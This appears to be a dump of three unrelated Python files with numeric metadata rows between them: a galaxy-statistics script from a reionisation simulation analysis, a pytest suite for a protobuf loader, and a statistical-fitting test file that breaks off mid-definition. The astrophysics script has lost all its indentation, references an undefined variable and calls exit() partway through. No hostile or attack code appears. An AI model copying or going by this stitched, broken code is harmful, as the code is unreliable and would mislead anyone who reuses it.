G = ReadScripts.Join_Arrays(GG, G_Merged, Gal_Desc) # Then join them together for all galaxies.
keep_files = 1 # Flips to 0 when we are done with this file.
current_model_number = model_number # Used to differentiate between outer model_number and the inner model_number because we can keep files across model_numbers.
while(keep_files == 1):
## Just a few definitions to cut down the clutter a smidge. ##
current_halo_cut = halo_cut[current_model_number]
NumSubsteps = number_substeps[current_model_number]
do_observed_LF = calculate_observed_LF[current_model_number]
for snapshot_idx in range(0, len(SnapList[current_model_number])): # Now let's calculate stats for each required redshift.
current_snap = SnapList[current_model_number][snapshot_idx] # Get rid of some clutter.
w_gal = np.where((G.GridHistory[:, current_snap] != -1) & (G.GridStellarMass[:, current_snap] > 0.0) & (G.LenHistory[:, current_snap] > current_halo_cut) & (G.GridSFR[:, current_snap] >= 0.0) & (G.GridFoFMass[:, current_snap] >= 0.0))[0] # Only include those galaxies that existed at the current snapshot, had positive (but not infinite) stellar/Halo mass and Star formation rate. Ensure the galaxies also resides in a halo that is sufficiently resolved.
w_merged_gal = np.where((G_Merged.GridHistory[:, current_snap] != -1) & (G_Merged.GridStellarMass[:, current_snap] > 0.0) & (G_Merged.LenHistory[:, current_snap] > current_halo_cut) & (G_Merged.GridSFR[:, current_snap] >= 0.0) & (G_Merged.GridFoFMass[:, current_snap] >= 0.0) & (G_Merged.LenMergerGal[:,current_snap] > current_halo_cut))[0]
print("There were {0} galaxies for snapshot {1} (Redshift {2:.3f}) model {3}.".format(len(w_gal), current_snap, AllVars.SnapZ[current_snap], current_model_number))
if (len(w_gal) == 0):
continue
mass_gal = np.log10(G.GridStellarMass[w_gal, current_snap] * 1.0e10 / AllVars.Hubble_h) # Msun. Log Units.
w_SFR = w_gal[np.where((G.GridSFR[w_gal, current_snap] > 0.0))[0]]
mass_SFR_gal = np.log10(G.GridStellarMass[w_SFR, current_snap] * \
1.0e10 / AllVars.Hubble_h)
SFR_gal = np.log10(G.GridSFR[w_SFR,current_snap])
sSFR_gal = SFR_gal - mass_SFR_gal
halo_part_count = G.LenHistory[w_gal, current_snap]
metallicity_gal = G.GridZ[w_gal, current_snap]
metallicity_tremonti_gal = np.log10(G.GridZ[w_gal, current_snap] / 0.02) + 9.0 # Using the Tremonti relationship for metallicity.
mass_central = np.log10(G.GridFoFMass[w_gal, current_snap] * 1.0e10 / AllVars.Hubble_h) # Msun. Log Units.
ejected_fraction = G.EjectedFraction[w_gal, current_snap]
w_dust = np.where(((G.GridDustColdGas[w_gal, current_snap]
+G.GridDustHotGas[w_gal, current_snap]
+G.GridDustEjectedMass[w_gal, current_snap]) > 0.0)
& (G.GridType[w_gal, current_snap] == 0))[0]
total_dust_gal = np.log10((G.GridDustColdGas[w_gal[w_dust], current_snap]
+G.GridDustHotGas[w_gal[w_dust], current_snap]
+G.GridDustEjectedMass[w_gal[w_dust], current_snap])
* 1.0e10 / AllVars.Hubble_h)
mass_gal_dust = np.log10(G.GridStellarMass[w_gal[w_dust], current_snap]
* 1.0e10 / AllVars.Hubble_h)
mass_centralgal_dust = np.log10(G.GridFoFMass[w_gal[w_dust], current_snap]
* 1.0e10 / AllVars.Hubble_h)
fesc = G.Gridfesc[w_gal, current_snap]
fesc[fesc < 0.0] = 0.0
Ngamma_gal = G.GridNgamma_HI[w_gal, current_snap] # 1.0e50
# photons/s.
if model_number < 3:
Ngamma_gal += 50.0 # Old versions of SAGE incorrectly
# subtracted 50.
Ngamma_gal *= fesc
reionmod = G.GridReionMod[w_gal, current_snap]
mass_reionmod_central = mass_central[reionmod > -1]
mass_reionmod_gal = mass_gal[reionmod > -1]
reionmod = reionmod[reionmod > -1] # Some satellite galaxies that don't have HotGas and hence won't be stripped. As a result reionmod = -1 for these. Ignore them.
mass_BH = G.GridBHMass[w_gal, current_snap] * 1.0e10 / AllVars.Hubble_h # Msun. Not log units.
L_UV = SFR_gal + 39.927 # Using relationship from STARBURST99, units of erg s^-1 A^-1. Log Units.
M_UV = AllVars.Luminosity_to_ABMag(L_UV, 1600)
if (do_observed_LF == 1): # Calculate the UV extinction if requested.
M_UV_obs = calculate_UV_extinction(AllVars.SnapZ[current_snap], L_UV, M_UV[snap_idx])
galaxy_halo_mass_mean_local, galaxy_halo_mass_std_local = Calculate_HaloPartStellarMass(halo_part_count, mass_gal, stellar_mass_halolen_lower[current_model_number], stellar_mass_halolen_upper[current_model_number]) # This is the average stellar mass for galaxies whose halos have the specified number of particles.
galaxy_halo_mass_mean[current_model_number][snapshot_idx] += pow(10, galaxy_halo_mass_mean_local) / (LastFile[current_model_number] + 1) # Adds to the average of the mean.
photofield_path = "{0}_{1:03d}".format(photo_array[current_model_number],
current_snap)
#photo_gal = photo.calc_gal_photoion(G.GridHistory[w_gal, current_snap],
# photofield_path,
# GridSize_array[current_model_number],
# precision_array[current_model_number])
#zreion_path = "{0}".format(zreion_array[current_model_number])
#zreion_gal = photo.calc_gal_zreion(G.GridHistory[w_gal, current_snap],
# zreion_path,
# GridSize_array[current_model_number],
# precision_array[current_model_number])
z_0 = 8.0
z_r = 7.0
gnedin_mfilt = ga.get_filter_mass(np.array(AllVars.SnapZ[current_snap]),
z_0, z_r)
gnedin_reionmod_gal = 1.0 / pow(1.0 + 0.26*pow(10, gnedin_mfilt - mass_central), 3.0)
###########################################
######## BASE PROPERTIES CALCULATED #######
###########################################
# Time to calculate relevant statistics.
### Functions of Galaxies/Stellar Mass ###
## Stellar Mass Function ##
(counts_local, bin_edges, bin_middle) = AllVars.Calculate_Histogram(mass_gal, bin_width, 0, m_gal_low, m_gal_high) # Bin the Stellar Mass
SMF[current_model_number][snapshot_idx] += counts_local
## Escape Fraction ##
(mean_fesc_galaxy_local, std_fesc_galaxy_local, N_local, sum_fesc_galaxy, bin_middle) = AllVars.Calculate_2D_Mean(mass_gal, fesc, bin_width, m_gal_low, m_gal_high)
(mean_fesc_galaxy_array[current_model_number][snapshot_idx], std_fesc_galaxy_array[current_model_number][snapshot_idx]) = update_cumulative_stats(mean_fesc_galaxy_array[current_model_number][snapshot_idx], std_fesc_galaxy_array[current_model_number][snapshot_idx], N_galaxy_array[current_model_number][snapshot_idx], mean_fesc_galaxy_local, std_fesc_galaxy_local, N_local)
## Black Hole Mass ##
(mean_BHmass_galaxy_local, std_BHmass_galaxy_local, N_local, sum_BHmass_galaxy, bin_middle) = AllVars.Calculate_2D_Mean(mass_gal, mass_BH, bin_width, m_gal_low, m_gal_high)
(mean_BHmass_galaxy_array[current_model_number][snapshot_idx], std_BHmass_galaxy_array[current_model_number][snapshot_idx]) = update_cumulative_stats(mean_BHmass_galaxy_array[current_model_number][snapshot_idx], std_BHmass_galaxy_array[current_model_number][snapshot_idx], N_galaxy_array[current_model_number][snapshot_idx], mean_BHmass_galaxy_local, std_BHmass_galaxy_local, N_local)
## Total Dust Mass ##
(mean_dust_galaxy_local, std_dust_galaxy_local, N_local,
sum_dust_galaxy, bin_middle) = AllVars.Calculate_2D_Mean(
mass_gal_dust, total_dust_gal,
bin_width, m_gal_low,
m_gal_high)
(mean_dust_galaxy_array[current_model_number][snapshot_idx],
std_dust_galaxy_array[current_model_number][snapshot_idx]) = \
update_cumulative_stats(mean_dust_galaxy_array[current_model_number][snapshot_idx],
std_dust_galaxy_array[current_model_number][snapshot_idx],
N_galaxy_array[current_model_number][snapshot_idx],
mean_dust_galaxy_local,
std_dust_galaxy_local,
N_local)
## Star Formation Rate ##
(mean_sfr_galaxy_local, std_sfr_galaxy_local, N_local,
sum_sfr_galaxy, bin_middle) = AllVars.Calculate_2D_Mean(
mass_SFR_gal, SFR_gal,
bin_width, m_gal_low,
m_gal_high)
(mean_sfr_galaxy_array[current_model_number][snapshot_idx],
std_sfr_galaxy_array[current_model_number][snapshot_idx]) = \
update_cumulative_stats(mean_sfr_galaxy_array[current_model_number][snapshot_idx],
std_sfr_galaxy_array[current_model_number][snapshot_idx],
N_galaxy_array[current_model_number][snapshot_idx],
mean_sfr_galaxy_local,
std_sfr_galaxy_local,
N_local)
## Specific Star Formation Rate ##
(mean_ssfr_galaxy_local, std_ssfr_galaxy_local, N_local,
sum_ssfr_galaxy, bin_middle) = AllVars.Calculate_2D_Mean(
mass_SFR_gal, sSFR_gal,
bin_width, m_gal_low,
m_gal_high)
(mean_ssfr_galaxy_array[current_model_number][snapshot_idx],
std_ssfr_galaxy_array[current_model_number][snapshot_idx]) = \
update_cumulative_stats(mean_ssfr_galaxy_array[current_model_number][snapshot_idx],
std_ssfr_galaxy_array[current_model_number][snapshot_idx],
N_galaxy_array[current_model_number][snapshot_idx],
mean_ssfr_galaxy_local,
std_ssfr_galaxy_local,
N_local)
## Number of Ionizing Photons ##
(mean_Ngamma_galaxy_local, std_Ngamma_galaxy_local, N_local,
sum_Ngamma_galaxy_local, bin_middle) = AllVars.Calculate_2D_Mean(
mass_gal, Ngamma_gal,
bin_width, m_gal_low,
m_gal_high)
(mean_Ngamma_galaxy_array[current_model_number][snapshot_idx],
std_Ngamma_galaxy_array[current_model_number][snapshot_idx]) = \
update_cumulative_stats(mean_Ngamma_galaxy_array[current_model_number][snapshot_idx],
std_Ngamma_galaxy_array[current_model_number][snapshot_idx],
N_galaxy_array[current_model_number][snapshot_idx],
mean_Ngamma_galaxy_local,
std_Ngamma_galaxy_local,
N_local)
## Photoionization rate ##
'''
(mean_photo_galaxy_local, std_photo_galaxy_local, N_local,
sum_photo_galaxy_local, bin_middle) = AllVars.Calculate_2D_Mean(
mass_gal, photo_gal,
bin_width, m_gal_low,
m_gal_high)
(mean_photo_galaxy_array[current_model_number][snapshot_idx],
std_photo_galaxy_array[current_model_number][snapshot_idx]) = \
update_cumulative_stats(mean_photo_galaxy_array[current_model_number][snapshot_idx],
std_photo_galaxy_array[current_model_number][snapshot_idx],
N_galaxy_array[current_model_number][snapshot_idx],
mean_photo_galaxy_local,
std_photo_galaxy_local,
N_local)
'''
## RSAGE Reionization Modifier ##
(mean_reionmod_galaxy_local, std_reionmod_galaxy_local, N_local,
sum_reionmod_galaxy_local, bin_middle) = AllVars.Calculate_2D_Mean(
mass_reionmod_gal, reionmod,
bin_width, m_gal_low,
m_gal_high)
(mean_reionmod_galaxy_array[current_model_number][snapshot_idx],
std_reionmod_galaxy_array[current_model_number][snapshot_idx]) = \
update_cumulative_stats(mean_reionmod_galaxy_array[current_model_number][snapshot_idx],
std_reionmod_galaxy_array[current_model_number][snapshot_idx],
N_galaxy_array[current_model_number][snapshot_idx],
mean_reionmod_galaxy_local,
std_reionmod_galaxy_local,
N_local)
## Gnedin Reionization Modifier ##
(mean_gnedin_reionmod_galaxy_local, std_gnedin_reionmod_galaxy_local, N_local,
sum_gnedin_reionmod_galaxy_local, bin_middle) = AllVars.Calculate_2D_Mean(
mass_gal, gnedin_reionmod_gal,
bin_width, m_gal_low,
m_gal_high)
(mean_gnedin_reionmod_galaxy_array[current_model_number][snapshot_idx],
std_gnedin_reionmod_galaxy_array[current_model_number][snapshot_idx]) = \
update_cumulative_stats(mean_gnedin_reionmod_galaxy_array[current_model_number][snapshot_idx],
std_gnedin_reionmod_galaxy_array[current_model_number][snapshot_idx],
N_galaxy_array[current_model_number][snapshot_idx],
mean_gnedin_reionmod_galaxy_local,
std_gnedin_reionmod_galaxy_local,
N_local)
N_galaxy_array[current_model_number][snapshot_idx] += N_local
### Functions of Halos/Halo Mass ###
## Ejected Fraction ##
(mean_ejected_halo_local, std_ejected_halo_local, N_local, sum_ejected_halo, bin_middle) = AllVars.Calculate_2D_Mean(mass_central, ejected_fraction, bin_width, m_low, m_high)
(mean_ejected_halo_array[current_model_number][snapshot_idx], std_ejected_halo_array[current_model_number][snapshot_idx]) = update_cumulative_stats(mean_ejected_halo_array[current_model_number][snapshot_idx], std_ejected_halo_array[current_model_number][snapshot_idx], N_halo_array[current_model_number][snapshot_idx], mean_ejected_halo_local, std_ejected_halo_local, N_local) # Then update the running total.
## Quasar Fraction ##
(mean_quasar_activity_local, std_quasar_activity_local,N_local, sum_quasar_activity_halo, bin_middle) = AllVars.Calculate_2D_Mean(mass_central, G.QuasarActivity[w_gal, current_snap], bin_width, m_low, m_high)
(mean_quasar_activity_array[current_model_number][snapshot_idx], std_quasar_activity_array[current_model_number][snapshot_idx]) = update_cumulative_stats(mean_quasar_activity_array[current_model_number][snapshot_idx], std_quasar_activity_array[current_model_number][snapshot_idx], N_halo_array[current_model_number][snapshot_idx], mean_quasar_activity_local, std_quasar_activity_local, N_local) # Then update the running total.
## fesc Value ##
(mean_fesc_halo_local, std_fesc_halo_local, N_local, sum_fesc_halo, bin_middle) = AllVars.Calculate_2D_Mean(mass_central, fesc, bin_width, m_low, m_high)
(mean_fesc_halo_array[current_model_number][snapshot_idx], std_fesc_halo_array[current_model_number][snapshot_idx]) = update_cumulative_stats(mean_fesc_halo_array[current_model_number][snapshot_idx], std_fesc_halo_array[current_model_number][snapshot_idx], N_halo_array[current_model_number][snapshot_idx], mean_fesc_halo_local, std_fesc_halo_local, N_local) # Then update the running total.
## Ngamma ##
#(mean_Ngamma_halo_local, std_Ngamma_halo_local, N_local, sum_Ngamma_halo, bin_middle) \
#= AllVars.Calculate_2D_Mean(mass_central, ionizing_photons, bin_width, m_low, m_high)
#mean_Ngamma_halo_local = np.divide(mean_Ngamma_halo_local, 1.0e50) ## Divide out a constant to keep the numbers manageable.
#std_Ngamma_halo_local = np.divide(std_Ngamma_halo_local, 1.0e50)
#(mean_Ngamma_halo_array[current_model_number][snapshot_idx], std_Ngamma_halo_array[current_model_number][snapshot_idx]) = update_cumulative_stats(mean_Ngamma_halo_array[current_model_number][snapshot_idx], std_Ngamma_halo_array[current_model_number][snapshot_idx], N_halo_array[current_model_number][snapshot_idx], mean_Ngamma_halo_local, std_Ngamma_halo_local, N_local) # Then update the running total.
## Reionization Modifier ##
(mean_reionmod_halo_local, std_reionmod_halo_local, N_local, sum_reionmod_halo, bin_middle) = AllVars.Calculate_2D_Mean(mass_reionmod_central, reionmod, bin_width, m_low, m_high)
(mean_reionmod_halo_array[current_model_number][snapshot_idx], std_reionmod_halo_array[current_model_number][snapshot_idx]) = update_cumulative_stats(mean_reionmod_halo_array[current_model_number][snapshot_idx], std_reionmod_halo_array[current_model_number][snapshot_idx], N_halo_array[current_model_number][snapshot_idx], mean_reionmod_halo_local, std_reionmod_halo_local, N_local) # Then update the running total.
## Total Dust Mass ##
(mean_dust_halo_local, std_dust_halo_local, N_local,
sum_dust_halo, bin_middle) = AllVars.Calculate_2D_Mean(
mass_centralgal_dust, total_dust_gal,
bin_width, m_low,
m_high)
(mean_dust_halo_array[current_model_number][snapshot_idx],
std_dust_halo_array[current_model_number][snapshot_idx]) = \
update_cumulative_stats(mean_dust_halo_array[current_model_number][snapshot_idx],
std_dust_halo_array[current_model_number][snapshot_idx],
N_halo_array[current_model_number][snapshot_idx],
mean_dust_halo_local,
std_dust_halo_local,
N_local)
N_halo_array[current_model_number][snapshot_idx] += N_local
### Functions of redshift ###
## Ngamma ##
#sum_Ngamma_z_array[current_model_number][snapshot_idx] += np.sum(np.divide(ionizing_photons, 1.0e50)) # Remember that we're dividing out a constant!
## fesc Value ##
(mean_fesc_z_array[current_model_number][snapshot_idx], std_fesc_z_array[current_model_number][snapshot_idx]) = update_cumulative_stats(mean_fesc_z_array[current_model_number][snapshot_idx], std_fesc_z_array[current_model_number][snapshot_idx], N_z[current_model_number][snapshot_idx], np.mean(fesc), np.std(fesc), len(w_gal)) # Updates the mean escape fraction for this redshift.
## Reionization Modifier ##
(mean_reionmod_z[current_model_number][snapshot_idx], std_reionmod_z[current_model_number][snapshot_idx]) = update_cumulative_stats(mean_reionmod_z[current_model_number][snapshot_idx], std_reionmod_z[current_model_number][snapshot_idx], N_reionmod_z[current_model_number][snapshot_idx], np.mean(reionmod), np.std(reionmod), len(reionmod))
N_reionmod_z[current_model_number][snapshot_idx] += len(reionmod)
## Ejected Fraction ##
(mean_ejected_z[current_model_number][snapshot_idx],std_ejected_z[current_model_number][snapshot_idx]) \
= update_cumulative_stats(mean_ejected_z[current_model_number][snapshot_idx],
std_ejected_z[current_model_number][snapshot_idx],
N_z[current_model_number][snapshot_idx],
np.mean(ejected_fraction),
np.std(ejected_fraction),
len(w_gal))
N_z[current_model_number][snapshot_idx] += len(w_gal)
#### Arrays that are just kept across snapshots ##
Ngamma_global[current_model_number][snapshot_idx].append(Ngamma_gal)
mass_global[current_model_number][snapshot_idx].append(mass_gal)
fesc_global[current_model_number][snapshot_idx].append(fesc)
#### Arrays that are function of fej ##
(mean_Ngamma_fej_local, std_Ngamma_fej_local, N_local,
sum_Ngamma_fej_local, bin_middle) = AllVars.Calculate_2D_Mean(
ejected_fraction, Ngamma_gal,
fej_bin_width, fej_low, fej_high)
(mean_Ngamma_fej[current_model_number][snapshot_idx],
std_Ngamma_fej[current_model_number][snapshot_idx]) = \
update_cumulative_stats(mean_Ngamma_fej[current_model_number][snapshot_idx],
std_Ngamma_fej[current_model_number][snapshot_idx],
N_fej[current_model_number][snapshot_idx],
mean_Ngamma_fej_local,
std_Ngamma_fej_local,
N_local)
N_fej[current_model_number][snapshot_idx] += N_local
done_model[current_model_number] = 1
if (current_model_number < number_models):
keep_files = same_files[current_model_number] # Decide if we want to keep the files loaded or throw them out.
current_model_number += 1 # Update the inner loop model number.
#StellarMassFunction(PlotSnapList, SMF, simulation_norm, FirstFile,
# LastFile, NumFile, galaxy_halo_mass_mean, model_tags,
# 1, paper_plots, "wtf")
#plot_reionmod(PlotSnapList, SnapList, simulation_norm, mean_reionmod_halo_array,
#std_reionmod_halo_array, N_halo_array, mean_reionmod_z,
#std_reionmod_z, N_reionmod_z, False, model_tags,
#"reionmod_selfcon")
#plot_dust_scatter(SnapList, mass_gal_dust, mass_centralgal_dust, total_dust_gal,
# "dust_scatter")
#plot_dust(PlotSnapList, SnapList, simulation_norm, mean_dust_galaxy_array,
# std_dust_galaxy_array, N_galaxy_array, mean_dust_halo_array,
# std_dust_halo_array, N_halo_array, False, model_tags,
# "dustmass_total")
#plot_stellarmass_blackhole(PlotSnapList, simulation_norm, mean_BHmass_galaxy_array,
# std_BHmass_galaxy_array, N_galaxy_array,
# FirstFile, LastFile, NumFile,
# model_tags, "StellarMass_BHMass")
#plot_ejectedfraction(SnapList, PlotSnapList, simulation_norm,
# mean_ejected_halo_array, std_ejected_halo_array,
# N_halo_array, mean_ejected_z, std_ejected_z, N_z,
# model_tags, "ejectedfraction")
#plot_quasars_count(SnapList, PlotSnapList, N_quasars_z, N_quasars_boost_z, N_z, mean_quasar_activity_array, std_quasar_activity_array, N_halo_array, mergers_halo_array, SMF, mergers_galaxy_array, fesc_prescription, simulation_norm, FirstFile, LastFile, NumFile, model_tags, "SN_Prescription")
plot_fesc_galaxy(SnapList, PlotSnapList, simulation_norm,
mean_fesc_galaxy_array, std_fesc_galaxy_array,
N_galaxy_array, mean_fesc_halo_array,
std_fesc_halo_array, N_halo_array,
galaxy_halo_mass_mean, model_tags,
paper_plots, mass_global, fesc_global, Ngamma_global,
"fesc_paper")
plot_reionmod_galaxy(SnapList, PlotSnapList, simulation_norm,
mean_reionmod_galaxy_array, std_reionmod_galaxy_array,
N_galaxy_array, mean_gnedin_reionmod_galaxy_array,
std_gnedin_reionmod_galaxy_array,
model_tags, paper_plots, "reionmod")
exit()
#plot_nion_galaxy(SnapList, PlotSnapList, simulation_norm,
# mean_Ngamma_galaxy_array, std_Ngamma_galaxy_array,
# N_galaxy_array, model_tags,
# paper_plots, "Ngamma")
'''
plot_photo_galaxy(SnapList, PlotSnapList, simulation_norm,
mean_photo_galaxy_array, std_photo_galaxy_array,
N_galaxy_array, model_tags,
paper_plots, "photo")
'''
plot_sfr_galaxy(SnapList, PlotSnapList, simulation_norm,
mean_sfr_galaxy_array, std_sfr_galaxy_array,
mean_ssfr_galaxy_array, std_ssfr_galaxy_array,
N_galaxy_array, model_tags, "sSFR")
#plot_fej_Ngamma(SnapList, PlotSnapList, simulation_norm,
# mean_Ngamma_fej, std_Ngamma_fej,
# N_fej, model_tags, "Ngamma_fej")
#plot_photoncount(SnapList, sum_Ngamma_z_array, simulation_norm, FirstFile, LastFile, NumFile, model_tags, "Ngamma_test") ## PARALELL COMPATIBLE
#plot_mvir_Ngamma(SnapList, mean_Ngamma_halo_array, std_Ngamma_halo_array, N_halo_array, model_tags, "Mvir_Ngamma_test", fesc_prescription, fesc_normalization, "/lustre/projects/p004_swin/jseiler/tiamat/halo_ngamma/") ## PARALELL COMPATIBLE
| 51.258188 | 474 | 0.610478 | 30,778 | 241,016 | 4.540224 | 0.04409 | 0.061715 | 0.037119 | 0.04298 | 0.748345 | 0.703733 | 0.653239 | 0.616263 | 0.578278 | 0.544987 | 0 | 0.025656 | 0.281467 | 241,016 | 4,701 | 475 | 51.269092 | 0.781254 | 0.256813 | 0 | 0.478646 | 0 | 0.009619 | 0.066813 | 0.016578 | 0 | 0 | 0 | 0 | 0.001154 | 1 | 0.01616 | false | 0.001539 | 0.011928 | 0.00077 | 0.03309 | 0.036553 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
81b28caa54d539dfc14006299c0cf1e06133e78c | 1,537 | py | Python | utils/deserializer/__tests__/test_protobuf_deserializer.py | Mouse-BB-Team/Bot-Detection | 4438d8ccec1baaa22f3357213e6d52a62ff6d618 | [
"MIT"
] | 5 | 2020-09-30T16:58:59.000Z | 2021-11-30T22:34:10.000Z | utils/deserializer/__tests__/test_protobuf_deserializer.py | Mouse-BB-Team/Bot-Detection | 4438d8ccec1baaa22f3357213e6d52a62ff6d618 | [
"MIT"
] | null | null | null | utils/deserializer/__tests__/test_protobuf_deserializer.py | Mouse-BB-Team/Bot-Detection | 4438d8ccec1baaa22f3357213e6d52a62ff6d618 | [
"MIT"
] | null | null | null | from utils.deserializer.protobuf_deserializer import ProtoLoader
from pathlib import Path
import pandas as pd
import pytest
PROTOFILES_DIR_PATH = Path(__file__).parent.joinpath("protofilesdir").absolute().__str__()
INVALID_PATH = "some/wrong/path"
@pytest.mark.parametrize('filepath', ["test_file.pb", "test_file_1.txt", "test_file_2.xml"])
def test_should_return_single_df_sequence_regardless_file_extension(filepath):
loader = ProtoLoader(PROTOFILES_DIR_PATH)
sequence = loader.get_single_sequence(filepath)
assert isinstance(sequence, pd.DataFrame)
def test_should_return_not_none_when_directory_not_empty():
loader = ProtoLoader(PROTOFILES_DIR_PATH)
seq_list = loader.get_list_of_sequences()
assert seq_list is not None
def test_should_return_correct_length_of_seq_list():
loader = ProtoLoader(PROTOFILES_DIR_PATH)
seq_list = loader.get_list_of_sequences()
assert len(seq_list) == 3
def test_should_return_empty_list_when_directory_empty():
loader = ProtoLoader(PROTOFILES_DIR_PATH + INVALID_PATH)
seq_list = loader.get_list_of_sequences()
assert len(seq_list) == 0
def test_should_check_for_list_when_directory_empty():
loader = ProtoLoader(PROTOFILES_DIR_PATH + INVALID_PATH)
seq_list = loader.get_list_of_sequences()
assert isinstance(seq_list, list)
def test_should_return_list_of_sequences():
loader = ProtoLoader(PROTOFILES_DIR_PATH)
seq_list = loader.get_list_of_sequences()
for seq in seq_list:
assert isinstance(seq, pd.DataFrame)
| 33.413043 | 92 | 0.791802 | 213 | 1,537 | 5.244131 | 0.295775 | 0.068935 | 0.106535 | 0.161146 | 0.424351 | 0.393912 | 0.389436 | 0.389436 | 0.389436 | 0.389436 | 0 | 0.002981 | 0.126871 | 1,537 | 45 | 93 | 34.155556 | 0.829359 | 0 | 0 | 0.34375 | 0 | 0 | 0.050748 | 0 | 0 | 0 | 0 | 0 | 0.1875 | 1 | 0.1875 | false | 0 | 0.125 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
81b8a377f7e00482ba8d3e94e5cc8f42cb23bfce | 28,078 | py | Python | tests/test_fitting.py | adrdrew/viroconcom | 3eb748ba8e3e076eddd174a0fcdfee3917aa4045 | [
"MIT"
] | null | null | null | tests/test_fitting.py | adrdrew/viroconcom | 3eb748ba8e3e076eddd174a0fcdfee3917aa4045 | [
"MIT"
] | 1 | 2020-05-18T11:06:28.000Z | 2020-05-18T11:06:28.000Z | tests/test_fitting.py | adrdrew/viroconcom | 3eb748ba8e3e076eddd174a0fcdfee3917aa4045 | [
"MIT"
] | null | null | null | import unittest
import csv
import numpy as np
from viroconcom.fitting import Fit
def read_benchmark_dataset(path='tests/testfiles/1year_dataset_A.txt'):
"""
Reads a datasets provided for the environmental contour benchmark.
Parameters
----------
path : string
Path to dataset including the file name, defaults to 'examples/datasets/A.txt'
Returns
-------
x : ndarray of doubles
Observations of the environmental variable 1.
y : ndarray of doubles
Observations of the environmental variable 2.
x_label : str
Label of the environmantal variable 1.
y_label : str
Label of the environmental variable 2.
"""
x = list()
y = list()
x_label = None
y_label = None
with open(path, newline='') as csv_file:
reader = csv.reader(csv_file, delimiter=';')
idx = 0
for row in reader:
if idx == 0:
x_label = row[1][
1:] # Ignore first char (is a white space).
y_label = row[2][
1:] # Ignore first char (is a white space).
if idx > 0: # Ignore the header
x.append(float(row[1]))
y.append(float(row[2]))
idx = idx + 1
x = np.asarray(x)
y = np.asarray(y)
return (x, y, x_label, y_label)
class FittingTest(unittest.TestCase):
def test_2d_fit(self):
"""
2-d Fit with Weibull and Lognormal distribution.
"""
prng = np.random.RandomState(42)
# Draw 1000 samples from a Weibull distribution with shape=1.5 and scale=3,
# which represents significant wave height.
sample_1 = prng.weibull(1.5, 1000)*3
# Let the second sample, which represents spectral peak period increase
# with significant wave height and follow a Lognormal distribution with
# mean=2 and sigma=0.2
sample_2 = [0.1 + 1.5 * np.exp(0.2 * point) +
prng.lognormal(2, 0.2) for point in sample_1]
# Describe the distribution that should be fitted to the sample.
dist_description_0 = {'name': 'Weibull_3p',
'dependency': (None, None, None),
'width_of_intervals': 2}
dist_description_1 = {'name': 'Lognormal',
'dependency': (None, None, 0),
'functions': (None, None, 'exp3')}
# Compute the fit.
my_fit = Fit((sample_1, sample_2),
(dist_description_0, dist_description_1))
dist0 = my_fit.mul_var_dist.distributions[0]
dist1 = my_fit.mul_var_dist.distributions[1]
self.assertAlmostEqual(dist0.shape(0), 1.4165147571863412, places=5)
self.assertAlmostEqual(dist0.scale(0), 2.833833521811032, places=5)
self.assertAlmostEqual(dist0.loc(0), 0.07055663251419833, places=5)
self.assertAlmostEqual(dist1.shape(0), 0.17742685807554776 , places=5)
#self.assertAlmostEqual(dist1.scale, 7.1536437634240135+2.075539206642004e^{0.1515051024957754x}, places=5)
self.assertAlmostEqual(dist1.loc, None, places=5)
# Now use a 2-parameter Weibull distribution instead of 3-p distr.
dist_description_0 = {'name': 'Weibull_2p',
'dependency': (None, None, None),
'width_of_intervals': 2}
dist_description_1 = {'name': 'Lognormal',
'dependency': (None, None, 0),
'functions': (None, None, 'exp3')}
my_fit = Fit((sample_1, sample_2),
(dist_description_0, dist_description_1))
self.assertEqual(str(my_fit)[0:5], 'Fit()')
def test_2d_benchmark_case(self):
"""
Reproduces the baseline results presented in doi: 10.1115/OMAE2019-96523 .
"""
sample_hs, sample_tz, label_hs, label_tz = read_benchmark_dataset(
path='tests/testfiles/allyears_dataset_A.txt')
# Describe the distribution that should be fitted to the sample.
dist_description_0 = {'name': 'Weibull_3p',
'dependency': (None, None, None),
'width_of_intervals': 0.5}
dist_description_1 = {'name': 'Lognormal_SigmaMu',
'dependency': (0, None, 0),
'functions': ('exp3', None, 'power3')} # Shape, location, scale.
# Compute the fit.
my_fit = Fit((sample_hs, sample_tz),
(dist_description_0, dist_description_1))
# Evaluate the fitted parameters.
dist0 = my_fit.mul_var_dist.distributions[0]
dist1 = my_fit.mul_var_dist.distributions[1]
self.assertAlmostEqual(dist0.shape(0), 1.48, delta=0.02)
self.assertAlmostEqual(dist0.scale(0), 0.944, delta=0.01)
self.assertAlmostEqual(dist0.loc(0), 0.0981, delta=0.001)
self.assertAlmostEqual(dist1.shape.a, 0, delta=0.001)
self.assertAlmostEqual(dist1.shape.b, 0.308, delta=0.002)
self.assertAlmostEqual(dist1.shape.c, -0.250, delta=0.002)
self.assertAlmostEqual(dist1.scale.a, 1.47 , delta=0.02)
self.assertAlmostEqual(dist1.scale.b, 0.214, delta=0.002)
self.assertAlmostEqual(dist1.scale.c, 0.641, delta=0.002)
self.assertAlmostEqual(dist1.scale(0), 4.3 , delta=0.1)
self.assertAlmostEqual(dist1.scale(2), 6, delta=0.1)
self.assertAlmostEqual(dist1.scale(5), 8, delta=0.1)
def test_2d_exponentiated_wbl_fit(self):
"""
Tests if a 2D fit that includes an exp. Weibull distribution works.
"""
prng = np.random.RandomState(42)
# Draw 1000 samples from a Weibull distribution with shape=1.5 and scale=3,
# which represents significant wave height.
sample_hs = prng.weibull(1.5, 1000)*3
# Let the second sample, which represents zero-upcrossing period increase
# with significant wave height and follow a Lognormal distribution with
# mean=2 and sigma=0.2
sample_tz = [0.1 + 1.5 * np.exp(0.2 * point) +
prng.lognormal(2, 0.2) for point in sample_hs]
# Define the structure of the probabilistic model that will be fitted to the
# dataset.
dist_description_hs = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
# Shape, Location, Scale, Shape2
'width_of_intervals': 0.5}
dist_description_tz = {'name': 'Lognormal_SigmaMu',
